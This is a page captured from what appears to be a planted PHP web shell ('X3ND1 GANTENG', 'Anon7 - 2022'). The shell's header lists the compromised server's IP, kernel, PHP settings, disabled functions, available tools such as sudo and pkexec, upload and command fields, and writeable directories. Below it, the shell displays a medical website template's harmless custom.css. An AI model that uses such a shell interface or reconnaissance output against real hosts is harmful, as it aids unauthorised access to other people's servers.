X3ND1 GANTENG
Server IP : 108.163.255.210  /  Your IP : 18.116.47.194
Web Server : Apache
System : Linux blossom.urlnameserver.com 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
User :  ( 1172)
PHP Version : 7.2.34
Disable Function : eval,escapeshellarg,proc_close,proc_get_status,proc_nice,proc_open,symlink,system,pcntl_exec,getrusage,chown,chgp,closelog,openlog,syslog,define_syslog_variables,php_ini_loaded_file,getservbyname,getservbyport,posix_getgid,posix_getgrgid,proc_terminate,pfsockopen,apache_child_terminate,posix_mkfifo,posix_setpgid,posix_setuid,hypot,pg_host,pos,posix_access,posix_getcwd,posix_getservbyname,myshellexec,getpid,posix_getsid,posix_isatty,posix_kill,posix_mknod,posix_setgid,posix_setsid,posix_setuid,posix_times,posix_uname,ps_fill,posix_getpwuid,global,ini_restore,zip_open,zip_read,rar_open,bzopen,bzread,bzwrite,apache_get_modules,apache_get_version,phpversionphpinfo,php_ini_scanned_files,get_current_user,disk_total_space,diskfreespace,leak,imap_list,hypo,filedump,safe_mode,getmygid,apache_getenv,apache_setenv,bzread,bzwrite,bzopen,phpini,higlight_file,dos_conv,get_cwd,er_log,cmd,e_name,vdir,get_dir,only_read,ftok,ftpexec,posix_getpwnam,mysql_list_dbs,disk_free_space,session_save_path,confirm_phpdoc_compiled,zip_entry_rea,php_u,psockopen,crack_opendict,crack_getlastmessage,crack_closedict,crack_check,fpassthru,posix_get_last_error,posix_getlogin,posix_getgroups,posix_strerror,posix_getrlimit,posix_getpgrp,posix_getgrnam,pos,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/unilinki/public_html/unilinkindia.com/public/front/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ BERANDA ]     

Current File : /home/unilinki/public_html/unilinkindia.com/public/front/css/custom.css
/*********************************************************************************

	Template Name: Template Full Name Here
	Description: A perfect template to build beautiful and unique medical websites. It comes with nice and clean design.
	Version: 1.0

	Note: This is custom css.

**********************************************************************************/

.client-p {
	font-size: 18px;
	text-align: center;
	padding: 10px 10px 25px 10px;
}

/* Custom CSS to add gaps around col-lg-3 columns */
.custom-gap .col-lg-3 {
	padding: 15px; /* Adjust the desired gap size here */
}

/* Custom CSS for white background */
.custom-gap .col-lg-3 .custom-column {
	background-color: #ffffff; /* Set the desired background color */
	border-radius: 5px; /* Optional: Add border-radius for rounded corners */
}

.testimonial {
	min-height: 500px;
}

.testimonial-desc {
	max-height: 200px;
	overflow: auto;
}

.testimonial-desc::-webkit-scrollbar {
	width: 5px;
}

/* Track */
.testimonial-desc::-webkit-scrollbar-track {
	background: #f1f1f1;
}

/* Handle */
.testimonial-desc::-webkit-scrollbar-thumb {
	background: #888;
	border-radius: 10px;
}

/* Handle on hover */
.testimonial-desc::-webkit-scrollbar-thumb:hover {
	background: #555;
}

.features-wrapper .in-feature h4 {
	margin-bottom: 6px;
	line-height: 26px;
}

.features-wrapper .in-feature-icon {
	transform: translate(0, -50%);
	top: 50%;
}

.features-area {
	padding: 10px 0;
	background: #f6f6f6 !important;
}

.wwd-img {
	text-align: center;
}

.wwd-img img {
	max-height: 281px;
	margin: 0 auto;
}

.services-area .in-service {
	min-height: 325px;
	-webkit-box-shadow: 0 0 10px rgba(3, 168, 243, 0.2);
	box-shadow: 0 0 10px rgba(3, 168, 243, 0.2);
}

.founder-img,
.why-img {
	text-align: center;
}

.founder-img img,
.why-img img {
	max-height: 375px;
	margin: 0 auto;
}

.in-service .in-service-transparenticon {
	display: none;
}

.theme-btn {
	border: 1px solid #03a8f3;
	border: 1px solid #03a8f3;
	background: #03a8f3;
	color: #fff;
	font-size: 16px;
	padding: 8px 30px;
	border-radius: 30px;
	font-weight: 600;
	color: #fff !important;
}

.theme-btn .fa {
	margin-left: 12px;
}

.client-list.custom-gap .col-lg-3 .custom-column {
	border: solid 1px #eeeeee;
}

.home-testimonial-area .testimonial-desc {
	max-height: 233px;
	min-height: 230px;
}

.home-blog-content {
	max-height: 312px;
	min-height: 310px;
}

.site-banner {
	position: relative;
}

/* .site-banner h1 {
	text-shadow: 0 3px 4px rgb(255 255 255 / 50%);
} */

.site-banner .see-more__arrow {
	position: absolute;
	left: 50%;
	bottom: 20px;
	transform: translate(-50%, 10px);
	z-index: 1;
}

.bounce {
	-webkit-animation-name: bounce;
	-moz-animation-name: bounce;
	-o-animation-name: bounce;
	animation-name: bounce;
	animation-duration: 2s;
	animation-timing-function: ease-in-out;
	animation-delay: 1s;
	animation-direction: alternate;
	animation-play-state: running;
	animation-iteration-count: infinite;
}

@keyframes bounce {
	0%,
	20%,
	50%,
	80%,
	100% {
		transform: translateY(0);
		opacity: 1;
	}
	40% {
		transform: translateY(-20px);
	}
	60% {
		transform: translateY(-10px);
	}
}

.homeheaderoverlap .header {
	position: fixed;
	left: 0;
	top: 0;
	width: 100%;
	background: transparent;
	z-index: 1;
	/*background: rgb(255 255 255 / 40%);*/
}

.homeheaderoverlap .header-bottom {
	background: transparent;
}

.header.fixed {
	background: #fff;
	transition: all 0.5s ease-in-out 0s;
}

.clients-area .section-title {
	margin-bottom: 0;
}

.service-details-content,
.service-details-img {
	height: 100% !important;
}

.service-details-img img {
	height: 378px;
	object-fit: cover;
}

.shadow-overlay {
	position: absolute;
	top: 0;
	right: 0;
	bottom: 0;
	left: 0;
	background: rgb(0, 0, 0);
	background: linear-gradient(
		180deg,
		rgba(0, 0, 0, 0) 0%,
		rgba(0, 0, 0, 0.6) 100%
	);
}

@media (max-width: 1199px) {
	.sm-order-inherit .order-2 {
		order: inherit !important;
	}
}

@media (max-width: 776px) {
	.signature-flex {
		display: block !important;
	}
	.signature-flex > div + div {
		margin-top: 15px;
	}
	.site-banner {
		height: 70vh !important;
	}
	.services-details-area .container {
		max-width: 100%;
	}
}

@media (max-width: 480px) {
	.custom-gap .col-lg-3 {
		width: 100%;
	}
}

Anon7 - 2022
SCDN GOK